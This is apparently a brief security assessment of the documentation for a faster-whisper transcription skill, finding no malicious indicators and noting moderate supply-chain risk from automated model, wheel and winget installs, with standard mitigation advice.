faster-whisper

This is documentation for a local transcription skill (faster-whisper) that legitimately requires downloading ML model weights and installing PyTorch/ffmpeg. I found no indicators of deliberate credential harvesting, data exfiltration, obfuscated payloads, or embedded malware in the provided text. The primary security concerns are standard supply-chain risks: automatic model and wheel downloads, and setup scripts that perform automated installs (especially on Windows via winget). These behaviors are expected for ML tooling but increase attack surface if upstream repositories, wheel indices, or the setup scripts themselves are compromised. Recommend: (1) inspect the actual setup.sh / setup.ps1 scripts before running — ensure they do not execute unverified remote code or pipe-to-shell; (2) pin model and wheel checksums or verify signatures where possible; (3) run installs in isolated environments (VMs/containers) and avoid running scripts with elevated privileges without review. Overall: low likelihood of intentional malicious behavior in the provided documentation, but moderate supply-chain risk due to external binary downloads and auto-install behavior.